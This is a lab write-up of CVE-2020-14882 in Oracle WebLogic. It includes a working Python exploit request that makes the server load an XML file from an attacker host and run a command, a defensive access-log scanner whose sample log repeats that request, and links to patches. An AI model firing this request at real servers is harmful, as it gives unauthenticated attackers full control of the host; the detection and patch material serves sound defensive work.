- Introduction
CVE-2020-14882 is a remote code execution (RCE) flaw in the Console component of Oracle WebLogic Server. The pre-authentication flaw was given an attack complexity of "low" and was highlighted as "easily exploitable" by Oracle, resulting in a critical CVSSv3 score of 9.8. Successful exploitation allows an unauthenticated attacker to compromise the Oracle WebLogic Server over HTTP and take complete control of the host. (About more - Tenable)
- Score Severity - CVSS 3
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
Victim (WebLogic Server): 192.168.0.15 - Windows 10 PRO running WebLogic Server.
Attacker (Hosted file XML): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
- For the first step, let's create a Python script that triggers the vulnerability in WebLogic.
Payload:
import requests

# Double-URL-encoded "../" steps out of the unauthenticated /console/images/ path
# into console.portal; the handle parameter points WebLogic at the hosted XML file.
url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
      '?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
      '(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
This payload makes WebLogic instantiate the Spring Framework class FileSystemXmlApplicationContext, which in turn sends a request to a server in the attacker's domain looking for the teste.xml file.
- We need to prepare the XML file that will be fetched by the victim. We created a standard Spring XML structure; the bean definition and its value fields are the important part of this step, because they are what gets executed on the victim. For this example, we are calling the Windows calculator executable.
- On the attacker's host, we need to serve the XML file so the victim can request it. For simplicity, we use Python's built-in http.server.
- Starting the attack 🎯. We run the script from step 1; in this step, the http.server log on the attacker host shows the victim requesting the XML file.
- RCE successfully executed 💥. On the victim's side, the Windows calculator launched by the remote code execution (RCE) is visible.
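As an added defender-side example (not part of the original write-up), the following Python scanner reads access-log lines and flags requests carrying the two traits of the request shown above: a double-URL-encoded traversal out of the unauthenticated /console/images/ path and a handle parameter naming FileSystemXmlApplicationContext. The log format, timestamps and IP addresses are constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Shape of a combined-format access log line; only client IP and request path are used.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Static-resource prefix that is served without authentication and abused by the traversal.
IMAGES_PREFIX = "/console/images/"
RISKY_HANDLE = "FileSystemXmlApplicationContext"


def inspect_request(raw_path: str) -> list:
    """Return the indicators found in one request path (empty list if clean)."""
    findings = []
    once = unquote(raw_path)    # first decode, as the container performs it
    twice = unquote(once)       # second decode reveals a double-encoded traversal
    if urlsplit(once).path.startswith(IMAGES_PREFIX):
        resolved = posixpath.normpath(urlsplit(twice).path)
        if not resolved.startswith(IMAGES_PREFIX):
            findings.append("double-encoded traversal out of " + IMAGES_PREFIX)
    handle = "".join(parse_qs(urlsplit(twice).query).get("handle", []))
    if RISKY_HANDLE in handle:
        findings.append("handle parameter loads a Spring XML context")
    return findings


def scan_access_log(lines) -> list:
    """Return (client_ip, path, findings) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            findings = inspect_request(m.group("path"))
            if findings:
                hits.append((m.group("ip"), m.group("path"), findings))
    return hits


# Constructed sample log: one ordinary image request and one request shaped
# like the exploit attempt in the write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Oct/2020:10:00:01 +0000] "GET /console/images/logo.png HTTP/1.1" 200 512
192.168.0.16 - - [28/Oct/2020:10:00:07 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://192.168.0.16:8000/Documents/teste.xml%22) HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for ip, path, findings in scan_access_log(SAMPLE_LOG.splitlines()):
        print(ip, path[:60], findings)
```

The traversal check normalises the twice-decoded path, so it also catches variants that use other encodings of "../" as long as they resolve outside /console/images/.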
On October 28, a security researcher named Jang published a blog post (in Vietnamese) about CVE-2020-14882, including partial details that could be used for a PoC. Jang is no stranger to WebLogic flaws, having been credited with discovering and reporting CVE-2020-2555 to Oracle, which patched the vulnerability in its January 2020 CPU. In March, Jang confirmed that CVE-2020-2555 was not completely fixed. The bypass for CVE-2020-2555 was disclosed by another researcher, Quynh Le of VNPT Information Security Center (ISC). Both Le and Jang are credited with reporting this bypass, which is identified as CVE-2020-2883. (About more - Tenable)
- Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (Doc ID 2771503.1). (Oracle Support)
- Oracle Critical Patch Update Advisory - October 2020. (Oracle Support)
- How to Mitigate the Impact of CVE-2020-14882 Weblogic. (Oracle Support)
- Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. (MITRE - CVE)